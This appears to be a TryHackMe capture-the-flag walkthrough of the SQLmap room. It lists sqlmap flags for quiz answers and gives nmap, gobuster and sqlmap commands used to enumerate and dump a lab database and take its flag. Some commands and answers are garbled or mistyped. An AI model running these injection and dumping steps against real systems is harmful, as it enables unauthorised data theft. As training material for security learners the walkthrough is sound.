TryHackMe-Walkthrough-SQLmap
SQLMAP : Learn about and use Sqlmap to exploit the web application
room link :
https://tryhackme.com/room/sqlmap
lets begin:
Task1 :Introduction
What is sqlmap?
sqlmap is an open source penetration testing tool developed by Bernardo Damele Assumpcao Guimaraes and Miroslav Stampar that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches lasting from database fingerprinting, fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Installing Sqlmap
If you’re using Kali Linux, sqlmap is pre-installed. Otherwise, you can download it here: https://github.com/sqlmapproject/sqlmap
Task 2 : Using SQLmap :
Which flag or option will allow you to add a URL to the command?
Answer : -u
Which flag would you use to add data to a POST request?
Answer : — data
There are two parameters: username and password. How would you tell sqlmap to use the username parameter for the attack?
Answer : -p username
Which flag would you use to show the advanced help menu?
Answer : -hh
Which flag allows you to retrieve everything?
Answer : -a
Which flag allows you to select the database name?
Answer : -D
Which flag would you use to retrieve database tables?
Answer : — tables
Which flag allows you to retrieve a table’s columns?
Answer : — columns
Which flag allows you to dump all the database table entries?
Answer : — dump-all
Which flag will give you an interactive SQL Shell prompt?
Answer : — sql-shell
You know the current db type is ‘MYSQL’. Which flag allows you to enumerate only MySQL databases?
Answer : — dbms=MYSQL
Task 3 SQLMap Challenge
What is the name of the interesting directory ?
let’s start enumurate the web server using Nmap
nmap ip_addr -vv
let’s check port 80
so let’s check other directory with gobuster or dirbuster
gobuster dir -u 'http://ip_addr/' -w /usr/share/wordlists/rockyou.txt
Answer : blood
Who is the current db user?
let check firstly the directory that we find it
let try to login , after let’s use burp suite to intercept the login page and save it in FILE.txt to use it with sqlmap
sqlmap -r file.txt --dbs
so we find many database so let’s check the current database
sqlmap -r file.txt --current-db
and here we go that’s it we find that the current databse named blood
Answer : blood.
Who is the current db user?
Answer : root
What is the final flag?
let’s use this query .
sqlmap -u "http://10.10.48.187/blood/view.php?id=1" -D blood -T flag --column
now let’s try to get the flag
sqlmap -u "http://10.10.48.187/blood/view.php?id=1" -D blood -T flag --columns--dbms=mysql
Answer : thm{sqlm@p_is_L0ve}
thank you for your feedback and your attention
#Cybersecurity #SQLInjection #WebAppSecurity #EthicalHacking #TryHackMe #MediumArticle #FeedbackWelcome